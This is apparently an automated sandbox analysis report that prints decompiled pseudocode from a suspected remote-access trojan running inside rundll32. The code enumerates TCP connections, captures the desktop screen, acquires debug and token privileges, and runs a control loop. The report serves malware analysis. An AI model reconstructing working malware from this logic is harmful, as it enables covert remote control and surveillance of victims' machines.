                                                                                              								_v548 = 0;
                                                                                              								__eflags =  *_t178;
                                                                                              								if( *_t178 > 0) {
                                                                                              									_t188 = 0;
                                                                                              									_v552 = 0;
                                                                                              									asm("o16 nop [eax+eax]");
                                                                                              									do {
                                                                                              										_v596 =  *((intOrPtr*)(_t188 +  &(_t178[2])));
                                                                                              										_v592 =  *((intOrPtr*)(_t188 +  &(_t178[3])));
                                                                                              										_v588 =  *((intOrPtr*)(_t188 +  &(_t178[4])));
                                                                                              										_v584 =  *((intOrPtr*)(_t188 +  &(_t178[5])));
                                                                                              										_t179 =  *((intOrPtr*)(_t188 +  &(_t178[6])));
                                                                                              										_push(_t179);
                                                                                              										_v580 =  *((intOrPtr*)(_t188 +  &(_t178[1])));
                                                                                              										_v576 = _t179;
                                                                                              										E0425D4D0(_t179,  &_v540);
                                                                                              										_t228 = _t223 + 4;
                                                                                              										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
                                                                                              										_t125 = LocalSize(_t199);
                                                                                              										_t180 = _v556;
                                                                                              										__eflags = _t125 - _t180;
                                                                                              										if(_t125 < _t180) {
                                                                                              											_t199 = LocalReAlloc(_t199, _t180, 0x42);
                                                                                              										}
                                                                                              										asm("movups xmm0, [ebp-0x250]");
                                                                                              										asm("movups [esi+edi], xmm0");
                                                                                              										asm("movups xmm0, [ebp-0x240]");
                                                                                              										asm("movups [esi+edi+0x10], xmm0");
                                                                                              										_t208 = _t204 + 0x20;
                                                                                              										E0427E060(_t208 + _t199,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                                                              										_t223 = _t228 + 0xc;
                                                                                              										_t133 = lstrlenW( &_v540);
                                                                                              										_t178 = _v544;
                                                                                              										_t188 = _v552 + 0x18;
                                                                                              										_v552 = _t188;
                                                                                              										_t204 = _t208 + _t133 * 2 + 2;
                                                                                              										_t135 = _v548 + 1;
                                                                                              										_v548 = _t135;
                                                                                              										__eflags = _t135 -  *_t178;
                                                                                              									} while (_t135 <  *_t178);
                                                                                              								}
                                                                                              								LocalReAlloc(_t199, _t204, 0x42);
                                                                                              								_t111 = _v544;
                                                                                              								__eflags = _t111;
                                                                                              								if(_t111 != 0) {
                                                                                              									HeapFree(GetProcessHeap(), 0, _t111);
                                                                                              								}
                                                                                              								goto L24;
                                                                                              							} else {
                                                                                              								_t137 = _v544;
                                                                                              								__eflags = _t137;
                                                                                              								if(_t137 == 0) {
                                                                                              									goto L5;
                                                                                              								} else {
                                                                                              									HeapFree(GetProcessHeap(), 0, _t137);
                                                                                              									__eflags = _v16 ^ _t215;
                                                                                              									return E04275AFE(_v16 ^ _t215);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_v544 = 0;
                                                                                              						_t143 =  *_t102(0,  &_v544, 1, 2, 5, 0);
                                                                                              						_t237 = _t143 - 0x7a;
                                                                                              						if(_t143 != 0x7a) {
                                                                                              							goto L5;
                                                                                              						} else {
                                                                                              							_push(_v544);
                                                                                              							_t144 = E04275B55( &_v544, 0, _t237);
                                                                                              							_t231 = _t223 + 4;
                                                                                              							_t201 = _t144;
                                                                                              							_v560 = _t201;
                                                                                              							_push(0);
                                                                                              							_push(5);
                                                                                              							_push(2);
                                                                                              							_push(1);
                                                                                              							_push( &_v544);
                                                                                              							_push(_t201);
                                                                                              							if(_v548() == 0) {
                                                                                              								_t202 = LocalAlloc(0x40, 0x2800);
                                                                                              								_v552 = 0;
                                                                                              								_t148 = _v560;
                                                                                              								__eflags =  *_t148;
                                                                                              								if( *_t148 > 0) {
                                                                                              									_t184 =  &(_t148[3]);
                                                                                              									_v548 = _t184;
                                                                                              									asm("o16 nop [eax+eax]");
                                                                                              									do {
                                                                                              										_v596 =  *((intOrPtr*)(_t184 - 4));
                                                                                              										_v592 =  *_t184;
                                                                                              										_v588 =  *((intOrPtr*)(_t184 + 4));
                                                                                              										_v584 =  *((intOrPtr*)(_t184 + 8));
                                                                                              										_t185 =  *((intOrPtr*)(_t184 + 0xc));
                                                                                              										_push(_t185);
                                                                                              										_v580 =  *((intOrPtr*)(_t184 - 8));
                                                                                              										_v576 = _t185;
                                                                                              										E0425D4D0(_t185,  &_v540);
                                                                                              										_t233 = _t231 + 4;
                                                                                              										_v556 = 0x22 + lstrlenW( &_v540) * 2 + _t204;
                                                                                              										_t161 = LocalSize(_t202);
                                                                                              										_t186 = _v556;
                                                                                              										__eflags = _t161 - _t186;
                                                                                              										if(_t161 < _t186) {
                                                                                              											_t202 = LocalReAlloc(_t202, _t186, 0x42);
                                                                                              										}
                                                                                              										asm("movups xmm0, [ebp-0x250]");
                                                                                              										asm("movups [esi+edi], xmm0");
                                                                                              										asm("movups xmm0, [ebp-0x240]");
                                                                                              										asm("movups [esi+edi+0x10], xmm0");
                                                                                              										_t211 = _t204 + 0x20;
                                                                                              										E0427E060(_t211 + _t202,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                                                              										_t231 = _t233 + 0xc;
                                                                                              										_t169 = lstrlenW( &_v540);
                                                                                              										_t193 = _v552 + 1;
                                                                                              										_t184 = _v548 + 0x18;
                                                                                              										_v552 = _t193;
                                                                                              										_v548 = _t184;
                                                                                              										_t204 = _t211 + _t169 * 2 + 2;
                                                                                              										__eflags = _t193 -  *_v560;
                                                                                              									} while (_t193 <  *_v560);
                                                                                              								}
                                                                                              								_v556 = LocalReAlloc(_t202, _t204, 0x42);
                                                                                              								E04275B0F(_v560);
                                                                                              								L24:
                                                                                              								__eflags = _v16 ^ _t215;
                                                                                              								return E04275AFE(_v16 ^ _t215);
                                                                                              							} else {
                                                                                              								E04275B0F(_t201);
                                                                                              								goto L5;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}
























































                                                                                              0x0425d579
                                                                                              0x0425d580
                                                                                              0x0425d584
                                                                                              0x0425d586
                                                                                              0x0425d58c
                                                                                              0x0425d593
                                                                                              0x0425d596
                                                                                              0x0425d59d
                                                                                              0x0425d5a5
                                                                                              0x0425d5a9
                                                                                              0x0425d629
                                                                                              0x0425d63d
                                                                                              0x0425d5ab
                                                                                              0x0425d5b1
                                                                                              0x0425d5b7
                                                                                              0x0425d5c1
                                                                                              0x0425d5c7
                                                                                              0x0425d5cf
                                                                                              0x0425d7a1
                                                                                              0x0425d7a3
                                                                                              0x0425d7a5
                                                                                              0x0425d95c
                                                                                              0x00000000
                                                                                              0x0425d7ab
                                                                                              0x0425d7af
                                                                                              0x0425d7c5
                                                                                              0x0425d7c7
                                                                                              0x0425d7c9
                                                                                              0x0425d806
                                                                                              0x0425d80c
                                                                                              0x0425d812
                                                                                              0x0425d814
                                                                                              0x0425d81a
                                                                                              0x0425d81c
                                                                                              0x0425d822
                                                                                              0x0425d824
                                                                                              0x0425d82a
                                                                                              0x0425d830
                                                                                              0x0425d834
                                                                                              0x0425d83e
                                                                                              0x0425d848
                                                                                              0x0425d852
                                                                                              0x0425d85c
                                                                                              0x0425d866
                                                                                              0x0425d867
                                                                                              0x0425d86d
                                                                                              0x0425d873
                                                                                              0x0425d878
                                                                                              0x0425d892
                                                                                              0x0425d898
                                                                                              0x0425d89e
                                                                                              0x0425d8a4
                                                                                              0x0425d8a6
                                                                                              0x0425d8b2
                                                                                              0x0425d8b2
                                                                                              0x0425d8b4
                                                                                              0x0425d8c2
                                                                                              0x0425d8c6
                                                                                              0x0425d8cd
                                                                                              0x0425d8d2
                                                                                              0x0425d8ee
                                                                                              0x0425d8f3
                                                                                              0x0425d8fd
                                                                                              0x0425d903
                                                                                              0x0425d90f
                                                                                              0x0425d915
                                                                                              0x0425d921
                                                                                              0x0425d924
                                                                                              0x0425d925
                                                                                              0x0425d92b
                                                                                              0x0425d92b
                                                                                              0x0425d830
                                                                                              0x0425d937
                                                                                              0x0425d93f
                                                                                              0x0425d945
                                                                                              0x0425d947
                                                                                              0x0425d954
                                                                                              0x0425d954
                                                                                              0x00000000
                                                                                              0x0425d7cb
                                                                                              0x0425d7cb
                                                                                              0x0425d7d1
                                                                                              0x0425d7d3
                                                                                              0x00000000
                                                                                              0x0425d7d9
                                                                                              0x0425d7e4
                                                                                              0x0425d7f1
                                                                                              0x0425d7fe
                                                                                              0x0425d7fe
                                                                                              0x0425d7d3
                                                                                              0x0425d7c9
                                                                                              0x0425d5d5
                                                                                              0x0425d5e2
                                                                                              0x0425d5ea
                                                                                              0x0425d5ec
                                                                                              0x0425d5ef
                                                                                              0x00000000
                                                                                              0x0425d5f1
                                                                                              0x0425d5f1
                                                                                              0x0425d5f7
                                                                                              0x0425d5fc
                                                                                              0x0425d5ff
                                                                                              0x0425d607
                                                                                              0x0425d60d
                                                                                              0x0425d60e
                                                                                              0x0425d610
                                                                                              0x0425d612
                                                                                              0x0425d614
                                                                                              0x0425d615
                                                                                              0x0425d61e
                                                                                              0x0425d64b
                                                                                              0x0425d64d
                                                                                              0x0425d653
                                                                                              0x0425d659
                                                                                              0x0425d65b
                                                                                              0x0425d661
                                                                                              0x0425d664
                                                                                              0x0425d66a
                                                                                              0x0425d670
                                                                                              0x0425d679
                                                                                              0x0425d681
                                                                                              0x0425d68a
                                                                                              0x0425d693
                                                                                              0x0425d69c
                                                                                              0x0425d69f
                                                                                              0x0425d6a0
                                                                                              0x0425d6a6
                                                                                              0x0425d6ac
                                                                                              0x0425d6b1
                                                                                              0x0425d6cb
                                                                                              0x0425d6d1
                                                                                              0x0425d6d7
                                                                                              0x0425d6dd
                                                                                              0x0425d6df
                                                                                              0x0425d6eb
                                                                                              0x0425d6eb
                                                                                              0x0425d6ed
                                                                                              0x0425d6fb
                                                                                              0x0425d6ff
                                                                                              0x0425d706
                                                                                              0x0425d70b
                                                                                              0x0425d727
                                                                                              0x0425d72c
                                                                                              0x0425d736
                                                                                              0x0425d748
                                                                                              0x0425d749
                                                                                              0x0425d74c
                                                                                              0x0425d755
                                                                                              0x0425d761
                                                                                              0x0425d764
                                                                                              0x0425d764
                                                                                              0x0425d670
                                                                                              0x0425d77c
                                                                                              0x0425d782
                                                                                              0x0425d95e
                                                                                              0x0425d964
                                                                                              0x0425d972
                                                                                              0x0425d620
                                                                                              0x0425d621
                                                                                              0x00000000
                                                                                              0x0425d626
                                                                                              0x0425d61e
                                                                                              0x0425d5ef
                                                                                              0x0425d5cf

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0425D59F
                                                                                              • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 0425D5C1
                                                                                              • LocalAlloc.KERNEL32(00000040,00002800), ref: 0425D645
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425D6BB
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425D6D1
                                                                                              • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0425D6E5
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425D70E
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425D736
                                                                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0425D770
                                                                                              • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 0425D79B
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000002), ref: 0425D7B5
                                                                                              • HeapFree.KERNEL32(00000000), ref: 0425D7E4
                                                                                              • LocalAlloc.KERNEL32(00000040,00002800), ref: 0425D806
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425D882
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425D898
                                                                                              • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0425D8AC
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425D8D5
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425D8FD
                                                                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0425D937
                                                                                              • HeapFree.KERNEL32(00000000), ref: 0425D954
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$Alloclstrlen$Heap$AddressFreeProcSize$LibraryLoadProcess
                                                                                              • String ID: AllocateAndGetTcpExTableFromStack$GetExtendedTcpTable$iphlpapi.dll
                                                                                              • API String ID: 1916288693-4277049092
                                                                                              • Opcode ID: 0ba6b8abbc01012fd9442a08c4c02a56fe9a417e383f1cf3bce80e36b7f41fbd
                                                                                              • Instruction ID: 0c7245cac46f0ecb921057632d54978d8dd951d8ab3d878d7cf327d8f52cece0
                                                                                              • Opcode Fuzzy Hash: 0ba6b8abbc01012fd9442a08c4c02a56fe9a417e383f1cf3bce80e36b7f41fbd
                                                                                              • Instruction Fuzzy Hash: C1C16071E502199BDB20DF68EC8DBA9B7B4FB58304F144199E80DE3251EB74AE81CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 76%
                                                                                              			E042623F0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
                                                                                              				signed int _v12;
                                                                                              				short _v144;
                                                                                              				struct tagMONITORINFO _v184;
                                                                                              				struct _devicemodeW _v408;
                                                                                              				signed int _t93;
                                                                                              				struct HICON__* _t96;
                                                                                              				void* _t97;
                                                                                              				void* _t98;
                                                                                              				struct HWND__* _t99;
                                                                                              				struct HMONITOR__* _t102;
                                                                                              				struct HDC__* _t114;
                                                                                              				intOrPtr* _t139;
                                                                                              				intOrPtr _t142;
                                                                                              				signed int _t153;
                                                                                              				void** _t154;
                                                                                              				struct HICON__** _t157;
                                                                                              				void** _t160;
                                                                                              				signed int _t164;
                                                                                              
                                                                                              				_t93 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t93 ^ _t164;
                                                                                              				asm("movaps xmm0, [0x429f950]");
                                                                                              				asm("movups [ebp-0x4c], xmm0");
                                                                                              				_push(__ebx);
                                                                                              				asm("movaps xmm0, [0x429f940]");
                                                                                              				_t139 = __ecx;
                                                                                              				asm("movups [ebp-0x3c], xmm0");
                                                                                              				_push(__esi);
                                                                                              				asm("movaps xmm0, [0x429f930]");
                                                                                              				asm("movups [ebp-0x2c], xmm0");
                                                                                              				_t2 = _t139 + 0xc4; // 0xc4
                                                                                              				_t157 = _t2;
                                                                                              				 *__ecx = 0x429ecb4;
                                                                                              				asm("movaps xmm0, [0x429f920]");
                                                                                              				_push(__edi);
                                                                                              				 *((intOrPtr*)(__ecx + 0x80)) = 0x429ec9c;
                                                                                              				_t153 = 0;
                                                                                              				asm("movups [ebp-0x1c], xmm0");
                                                                                              				do {
                                                                                              					 *(_t157 - 0x40) =  *(_t164 + _t153 * 4 - 0x4c);
                                                                                              					_t96 = LoadCursorW(0,  *(_t164 + _t153 * 4 - 0x4c));
                                                                                              					_t153 = _t153 + 1;
                                                                                              					 *_t157 = _t96;
                                                                                              					_t157 =  &(_t157[1]);
                                                                                              				} while (_t153 < 0x10);
                                                                                              				_t142 = _a4;
                                                                                              				_t97 = _t142 - 1;
                                                                                              				if(_t97 > 0x1f) {
                                                                                              					L5:
                                                                                              					 *(_t139 + 0x68) = 0x20;
                                                                                              				} else {
                                                                                              					switch( *((intOrPtr*)(( *(_t97 + 0x4262664) & 0x000000ff) * 4 +  &M0426265C))) {
                                                                                              						case 0:
                                                                                              							goto L4;
                                                                                              						case 1:
                                                                                              							goto L5;
                                                                                              					}
                                                                                              				}
                                                                                              				_t98 = E04265570(_t139, _t153, _t157);
                                                                                              				_t170 = _t98;
                                                                                              				if(_t98 != 0) {
                                                                                              					ReleaseDC( *(_t139 + 0x104),  *(_t139 + 0x3c));
                                                                                              				}
                                                                                              				_t99 = GetDesktopWindow();
                                                                                              				 *(_t139 + 0x104) = _t99;
                                                                                              				 *(_t139 + 0x3c) = GetDC(_t99);
                                                                                              				 *((intOrPtr*)(_t139 + 0x10)) = 0xcc0020;
                                                                                              				 *((char*)(_t139 + 4)) = 2;
                                                                                              				 *((intOrPtr*)(_t139 + 8)) = 0x64;
                                                                                              				 *((char*)(_t139 + 0xc)) = _a8;
                                                                                              				_t102 = GetDesktopWindow();
                                                                                              				__imp__MonitorFromWindow(_t102, 2);
                                                                                              				_v184.cbSize = 0x68;
                                                                                              				GetMonitorInfoW(_t102,  &_v184);
                                                                                              				_v408.dmSize = 0xdc;
                                                                                              				EnumDisplaySettingsW( &_v144, 0xffffffff,  &_v408);
                                                                                              				 *(_t139 + 0x20) = _v408.dmPelsWidth;
                                                                                              				 *(_t139 + 0x24) = _v408.dmPelsHeight;
                                                                                              				asm("cdq");
                                                                                              				 *((char*)(_t139 + 0x1c)) = 0x20 /  *(_t139 + 0x68);
                                                                                              				 *(_t139 + 0x28) = 0;
                                                                                              				 *(_t139 + 0x44) = CreateCompatibleDC( *(_t139 + 0x3c));
                                                                                              				 *(_t139 + 0x78) = CreateCompatibleDC( *(_t139 + 0x3c));
                                                                                              				 *(_t139 + 0x40) = CreateCompatibleDC(0);
                                                                                              				_t114 = CreateCompatibleDC(0);
                                                                                              				_t48 = _t139 + 0x54; // 0x54
                                                                                              				_t160 = _t48;
                                                                                              				 *(_t139 + 0x48) = _t114;
                                                                                              				_t51 = _t139 + 0x58; // 0x58
                                                                                              				_t154 = _t51;
                                                                                              				 *_t160 = 0;
                                                                                              				 *_t154 = 0;
                                                                                              				 *(_t139 + 0x5c) = E042628C0(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20), 1);
                                                                                              				 *(_t139 + 0x60) = E042628C0(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20),  *(_t139 + 0x24));
                                                                                              				 *((intOrPtr*)(_t139 + 0x64)) = E042628C0(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20), 1);
                                                                                              				 *(_t139 + 0x4c) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x5c), 0, _t160, 0, 0);
                                                                                              				 *(_t139 + 0x50) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x60), 0, _t154, 0, 0);
                                                                                              				_t66 = _t139 + 0x70; // 0x70
                                                                                              				 *(_t139 + 0x7c) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x60), 0, _t66, 0, 0);
                                                                                              				SelectObject( *(_t139 + 0x44),  *(_t139 + 0x50));
                                                                                              				SelectObject( *(_t139 + 0x40),  *(_t139 + 0x4c));
                                                                                              				SelectObject( *(_t139 + 0x78),  *(_t139 + 0x7c));
                                                                                              				SetRect(_t139 + 0x2c, 0, 0,  *(_t139 + 0x20),  *(_t139 + 0x24));
                                                                                              				 *((intOrPtr*)(_t139 + 0x14)) = E04275B55(_t139, SelectObject, _t170);
                                                                                              				 *(_t139 + 0x6c) =  *(_t139 + 0x60)->bmiHeader.biSizeImage /  *(_t139 + 0x24);
                                                                                              				 *(_t139 + 0x18) = 0;
                                                                                              				return E04275AFE(_v12 ^ _t164,  *(_t139 + 0x60)->bmiHeader.biSizeImage +  *(_t139 + 0x60)->bmiHeader.biSizeImage);
                                                                                              			}





















                                                                                              0x042623f9
                                                                                              0x04262400
                                                                                              0x04262403
                                                                                              0x0426240a
                                                                                              0x0426240e
                                                                                              0x0426240f
                                                                                              0x04262416
                                                                                              0x04262418
                                                                                              0x0426241c
                                                                                              0x0426241d
                                                                                              0x04262424
                                                                                              0x04262428
                                                                                              0x04262428
                                                                                              0x0426242e
                                                                                              0x04262434
                                                                                              0x0426243b
                                                                                              0x0426243c
                                                                                              0x04262446
                                                                                              0x04262448
                                                                                              0x04262450
                                                                                              0x04262457
                                                                                              0x0426245a
                                                                                              0x04262460
                                                                                              0x04262461
                                                                                              0x04262463
                                                                                              0x04262466
                                                                                              0x0426246b
                                                                                              0x0426246e
                                                                                              0x04262474
                                                                                              0x04262489
                                                                                              0x04262489
                                                                                              0x04262476
                                                                                              0x0426247d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426247d
                                                                                              0x04262490
                                                                                              0x04262495
                                                                                              0x04262497
                                                                                              0x042624a2
                                                                                              0x042624a2
                                                                                              0x042624ae
                                                                                              0x042624b1
                                                                                              0x042624bd
                                                                                              0x042624c3
                                                                                              0x042624ca
                                                                                              0x042624ce
                                                                                              0x042624d5
                                                                                              0x042624d8
                                                                                              0x042624dd
                                                                                              0x042624e9
                                                                                              0x042624f5
                                                                                              0x04262501
                                                                                              0x04262515
                                                                                              0x04262521
                                                                                              0x0426252a
                                                                                              0x04262532
                                                                                              0x0426253f
                                                                                              0x04262542
                                                                                              0x0426254e
                                                                                              0x04262555
                                                                                              0x0426255c
                                                                                              0x0426255f
                                                                                              0x04262566
                                                                                              0x04262566
                                                                                              0x04262569
                                                                                              0x0426256f
                                                                                              0x0426256f
                                                                                              0x04262572
                                                                                              0x0426257a
                                                                                              0x0426258a
                                                                                              0x0426259f
                                                                                              0x042625ba
                                                                                              0x042625c2
                                                                                              0x042625d8
                                                                                              0x042625db
                                                                                              0x042625f5
                                                                                              0x042625f8
                                                                                              0x04262600
                                                                                              0x04262608
                                                                                              0x04262618
                                                                                              0x0426262c
                                                                                              0x04262643
                                                                                              0x04262649
                                                                                              0x04262659

                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,?), ref: 0426245A
                                                                                                • Part of subcall function 04265570: GetCurrentThreadId.KERNEL32 ref: 04265588
                                                                                                • Part of subcall function 04265570: GetThreadDesktop.USER32(00000000), ref: 0426558F
                                                                                                • Part of subcall function 04265570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 042655CF
                                                                                                • Part of subcall function 04265570: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 042655DA
                                                                                                • Part of subcall function 04265570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0426560E
                                                                                                • Part of subcall function 04265570: lstrcmpi.KERNEL32(?,?), ref: 0426561E
                                                                                                • Part of subcall function 04265570: SetThreadDesktop.USER32(00000000), ref: 04265629
                                                                                                • Part of subcall function 04265570: CloseDesktop.USER32(?), ref: 0426563D
                                                                                                • Part of subcall function 04265570: CloseDesktop.USER32(00000000), ref: 04265640
                                                                                              • ReleaseDC.USER32(?,?), ref: 042624A2
                                                                                              • GetDesktopWindow.USER32 ref: 042624AE
                                                                                              • GetDC.USER32(00000000), ref: 042624B7
                                                                                              • GetDesktopWindow.USER32 ref: 042624D8
                                                                                              • MonitorFromWindow.USER32(00000000,00000002), ref: 042624DD
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 042624F5
                                                                                              • EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 04262515
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 04262549
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 04262551
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 04262558
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0426255F
                                                                                              • CreateDIBSection.GDI32(?,?,00000000,00000054,00000000,00000000), ref: 042625C0
                                                                                              • CreateDIBSection.GDI32(?,?,00000000,00000058,00000000,00000000), ref: 042625D2
                                                                                              • CreateDIBSection.GDI32(?,?,00000000,00000070,00000000,00000000), ref: 042625E7
                                                                                              • SelectObject.GDI32(?,?), ref: 042625F8
                                                                                              • SelectObject.GDI32(?,?), ref: 04262600
                                                                                              • SelectObject.GDI32(?,?), ref: 04262608
                                                                                              • SetRect.USER32(00000020,00000000,00000000,?,00000002), ref: 04262618
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateDesktop$Object$Compatible$SectionSelectThreadWindow$CloseInformationMonitorUser$CurrentCursorDisplayEnumFromInfoInputLoadOpenRectReleaseSettingslstrcmpi
                                                                                              • String ID: $ $d$h
                                                                                              • API String ID: 1416193606-3710049695
                                                                                              • Opcode ID: 4608df5339603b60a740b891e1120a7dcc932f821a522fa2fd26060dd8e79588
                                                                                              • Instruction ID: 185865ea0b2ec47216360eef253199bc178234c00cb920d8236618226ec0459d
                                                                                              • Opcode Fuzzy Hash: 4608df5339603b60a740b891e1120a7dcc932f821a522fa2fd26060dd8e79588
                                                                                              • Instruction Fuzzy Hash: AD814AB1A00204EBEF55AF68DC88B997FB5FF08304F004199ED089B266DB75E895CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E04269E60(void* __eflags) {
                                                                                              				void* _v8;
                                                                                              				int _v12;
                                                                                              				char _v16;
                                                                                              				void* _v20;
                                                                                              				char _v24;
                                                                                              				long _v28;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t19;
                                                                                              				void* _t22;
                                                                                              				long _t25;
                                                                                              				void* _t26;
                                                                                              				long _t31;
                                                                                              				int _t41;
                                                                                              				long _t42;
                                                                                              				void* _t48;
                                                                                              				void* _t52;
                                                                                              				intOrPtr* _t53;
                                                                                              				void* _t74;
                                                                                              				void* _t78;
                                                                                              				void* _t80;
                                                                                              				void* _t82;
                                                                                              				signed int _t86;
                                                                                              				void* _t88;
                                                                                              
                                                                                              				_t88 = (_t86 & 0xfffffff8) - 0x14;
                                                                                              				_push(_t80);
                                                                                              				_t74 = E0426ADD0(L"SeTcbPrivilege", _t80);
                                                                                              				_t81 = E0426ADD0(L"SeDebugPrivilege", _t80);
                                                                                              				_t52 = E0426AC90(L"SeIncreaseQuotaPrivilege", _t74, _t81);
                                                                                              				_t19 = E0426AC90(L"SeAssignPrimaryTokenPrivilege", _t74, _t81);
                                                                                              				_t20 = Sleep;
                                                                                              				if(_t19 == 0) {
                                                                                              					Sleep(0x1388);
                                                                                              					_t20 = Sleep;
                                                                                              				}
                                                                                              				if(_t52 == 0) {
                                                                                              					 *_t20(0xbb8);
                                                                                              				}
                                                                                              				_t53 = Sleep;
                                                                                              				if(_t74 == 0) {
                                                                                              					Sleep(0x1388);
                                                                                              				}
                                                                                              				_t95 = _t81;
                                                                                              				if(_t81 == 0) {
                                                                                              					Sleep(0x1388);
                                                                                              				}
                                                                                              				_v8 = 0;
                                                                                              				_v12 = 0;
                                                                                              				E04269390(_t53,  &_v16, _t74, _t81, _t95, L"Dispatch");
                                                                                              				_t75 = CloseHandle;
                                                                                              				if(_v20 != 0) {
                                                                                              					L20:
                                                                                              					_t82 = 0;
                                                                                              					__eflags = 0;
                                                                                              					goto L21;
                                                                                              				} else {
                                                                                              					_t97 = _v12;
                                                                                              					_t55 = WaitForSingleObject;
                                                                                              					if(_v12 == 0) {
                                                                                              						while(1) {
                                                                                              							L25:
                                                                                              							_t25 = E042694D0(_t55, L"Control", _t75, _t81, _t105);
                                                                                              							_t106 = _t25;
                                                                                              							if(_t25 == 0) {
                                                                                              							}
                                                                                              							L26:
                                                                                              							_t62 =  &_v28;
                                                                                              							_v28 = 0;
                                                                                              							_t77 = E04269620(_t55,  &_v28, _t75, _t81, _t106);
                                                                                              							if(_t28 == 0) {
                                                                                              								L24:
                                                                                              								_t75 = CloseHandle;
                                                                                              								while(1) {
                                                                                              									L25:
                                                                                              									_t25 = E042694D0(_t55, L"Control", _t75, _t81, _t105);
                                                                                              									_t106 = _t25;
                                                                                              									if(_t25 == 0) {
                                                                                              									}
                                                                                              									goto L26;
                                                                                              								}
                                                                                              							}
                                                                                              							_t70 = _v28;
                                                                                              							if(_v28 == 0) {
                                                                                              								goto L24;
                                                                                              							}
                                                                                              							_t81 = E04269910(_t77, _t70, _t62);
                                                                                              							E04275B0F(_t77);
                                                                                              							_t75 = CloseHandle;
                                                                                              							_t88 = _t88 + 8;
                                                                                              							if(_t81 != 0) {
                                                                                              								_t31 = WaitForSingleObject(_t81, 0xbb8);
                                                                                              								_t105 = _t31 - 0x102;
                                                                                              								if(_t31 == 0x102) {
                                                                                              									CloseHandle(_t81);
                                                                                              								}
                                                                                              							}
                                                                                              							while(1) {
                                                                                              								L25:
                                                                                              								_t25 = E042694D0(_t55, L"Control", _t75, _t81, _t105);
                                                                                              								_t106 = _t25;
                                                                                              								if(_t25 == 0) {
                                                                                              								}
                                                                                              								goto L31;
                                                                                              							}
                                                                                              							goto L26;
                                                                                              							L31:
                                                                                              							__eflags = _t25 - 0x1fffffff;
                                                                                              							if(_t25 == 0x1fffffff) {
                                                                                              								do {
                                                                                              									_t26 = SetConsoleCtrlHandler(E0426AAF0, 0);
                                                                                              									__eflags = _t26;
                                                                                              								} while (_t26 != 0);
                                                                                              								_t82 = 0x315;
                                                                                              								L21:
                                                                                              								_t22 = _v8;
                                                                                              								__eflags = _t22;
                                                                                              								if(_t22 != 0) {
                                                                                              									CloseHandle(_t22);
                                                                                              								}
                                                                                              								return _t82;
                                                                                              							}
                                                                                              							__eflags = _t25 - 0x2fffffff;
                                                                                              							if(__eflags != 0) {
                                                                                              								_t81 = OpenThread(0x1fffff, 0, _t25);
                                                                                              								__eflags = _t81;
                                                                                              								if(__eflags == 0) {
                                                                                              									goto L26;
                                                                                              								}
                                                                                              								WaitForSingleObject(_t81, 0xffffffff);
                                                                                              								CloseHandle(_t81);
